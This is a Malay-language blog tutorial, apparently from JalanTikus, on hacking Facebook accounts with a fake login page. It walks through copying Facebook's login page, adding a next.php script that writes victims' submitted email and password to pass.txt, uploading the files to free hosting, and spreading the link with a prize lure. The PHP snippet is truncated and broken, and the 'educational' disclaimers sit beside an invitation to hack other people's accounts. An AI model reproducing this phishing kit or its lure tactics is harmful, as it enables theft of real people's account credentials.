Cara Muat turun dan Gunakan Skrip Hack FB 2020, Buat Log Masuk Palsu!

Adakah anda mahu menggodam Facebook orang lain? Ayuh, cuba muat turun skrip hack FB 2020 terbaru untuk membuat log masuk palsu dengan kod HTML untuk FB, lihat lengkap di sini!

Siapa di antara anda yang tidak mempunyai akaun media sosial ini yang dibuat oleh Mark Zuckerberg ? Pasti anda semua mempunyai akaun Facebook , bukan?

Sejak pertama kali membuat akaun Facebook anda, berapa banyak maklumat, foto, dan data peribadi yang anda kongsi di sana? Pasti tidak dikira, deh!

Dengan begitu banyak data pengguna, tentu ada beberapa kalangan yang berniat mencuri data di Facebook.

Salah satu cara adalah dengan menggunakan skrip hack FB untuk membuat login palsu atau login palsu. Oleh itu, jika anda tidak menipu, mari belajar bagaimana membuat log masuk palsu di Facebook seperti ini!

 • Cara Meretas Facebook dengan Skrip Hack FB 2020 Terkini
 • Ketahui Teknik Masuk Palsu, Cara Meretas FB dengan Skrip / Kod HTML!

  Sumber foto: guidepedia.info (Tutorial log masuk palsu dengan skrip hack FB ini, anda boleh menguji rakan anda untuk menguji pandangan mereka, geng.)

  Kaedah penggodaman dengan membuat kod HTML untuk FB dan membuat halaman masuk palsu, sama dengan teknik peretasan pancingan data yang popular di kalangan penggodam.

  Dengan menggunakan halaman log masuk Facebook palsu , data anda dalam bentuk e-mel dan kata laluan akan disimpan di hosting penggodam dan tentunya dapat diambil alih dengan mudah.

  Sekarang anda memahami bahaya, bukan? Jadi kali ini Jaka akan mengajar anda bagaimana membuat skrip FB hack HTML yang biasa digunakan untuk kaedah ini.

  DISCLAIMER:


  Cara hack Facebook dengan script hack FB login palsu yang akan dibagikan di bawah ini hanya bersifat sebagai edukasi untuk langkah preventif guna mencegah hal ini terjadi padamu, geng.

  Cara Meretas Facebook dengan Skrip Hack FB 2020 Terkini

  Sebelum mengikuti tutorial kali ini, anda memerlukan hosting atau web hosting untuk dapat memuat naik skrip hack FB yang telah anda ubah dan gunakan untuk memerangkap mangsa.

  Sekiranya anda belum memilikinya, Jaka sudah mempunyai beberapa cadangan hosting web percuma terbaik yang boleh digunakan untuk menyokong langkah-langkah seperti di bawah. Ayuh, dengar!

  Langkah 1 - Simpan Halaman Log Masuk Facebook

  • Kali pertama anda perlu menyimpan halaman log masuk Facebook (//www.facebook.com/login.php/) yang boleh anda buka di Google Chrome.
  • Untuk menyimpannya, anda boleh hanya klik kanan dan pilih Save As ... pilihan .

  Langkah 2 - Muat turun Skrip Hack Facebook

  • Hasil muat turun itu sendiri akan menjadi fail "Masukkan Facebook _ Facebook.html" dan folder "Masukkan Facebook _ Facebook_files" .
  • Di sini anda hanya memuat turun skrip hack FB bernama "Enter Facebook _ Facebook.html" yang boleh anda muat turun di bawah dan ganti fail sebelumnya dengan meletakkannya di folder yang sama.

  Muat turun di sini: Hack Skrip FB untuk Masuk Palsu

  Langkah 3 - Buat Skrip Facebook Tambahan

  • Kemudian anda boleh membuat skrip tambahan dalam bentuk fail yang disebut next.php . Caranya anda hanya copy-paste skrip hack FB di bawah ke Notepad dan simpan dengan nama next.php.

  $value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>

  Langkah 4 - Buat Skrip Kata Laluan Facebook

  • Jangan lupa juga, anda memerlukan fail Notepad kosong bernama pass.txt . Fail ini sendiri berguna untuk menampung e-mel Facebook dan kata laluan mangsa yang ditipu.

  Langkah 5 - Muat naik Skrip Hack FB ke Hosting

  • Seperti yang dinyatakan Jaka di atas, anda perlu memuat naik semua fail dan skrip Facebook ke perkhidmatan hosting fail yang telah anda buat.
  • Isi fail yang mesti diunggah adalah folder "Enter Facebook _ Facebook_files" , file "Enter Facebook _ Facebook.html" yang telah diunduh , next.php , dan pass.txt seperti berikut.

  Langkah 6 - Sebarkan Pautan Log Masuk Facebook Palsu

  • Sekiranya semua langkah di atas telah anda lakukan, sekarang anda hanya perlu menyebarkan pautan log masuk Facebook palsu yang anda buat sebelumnya.
  • Anda boleh membuatnya dengan ayat pengantar yang mengandungi daya tarikan untuk mendapatkan hadiah yang hanya dilengkapi dengan log masuk Facebook.

  Langkah 7 - E-mel dan Kata Laluan Facebook berjaya digodam

  • Sekiranya skrip hack FB yang anda buat sebelumnya berfungsi, fail pass.txt akan merekodkan e-mel dan kata laluan Facebook mangsa, yang hasilnya akan seperti di bawah, geng.

  DISCLAIMER:


  Jaka tidak menjadi penerapan script hack FB bakal berhasil 100% walapun kamu mengikuti langkah-langkah di atas. Pasalnya Facebook terus meng- update sistem keamanannya untuk mencegah celah peretasan, geng.

  Nah, itu adalah gambaran ringkas mengenai cara memuat turun dan menggunakan skrip hack FB yang boleh anda praktikkan sendiri. Setelah mengetahui, tentu anda harus lebih berhati-hati, bukan?

  Oleh itu, jangan sesekali log masuk ke halaman tanpa memperhatikan alamat URL terlebih dahulu. Semoga berjaya dan semoga bermanfaat!

  Baca juga artikel mengenai Facebook atau artikel menarik lain dari JalanTikus .

  Artikel Berkaitan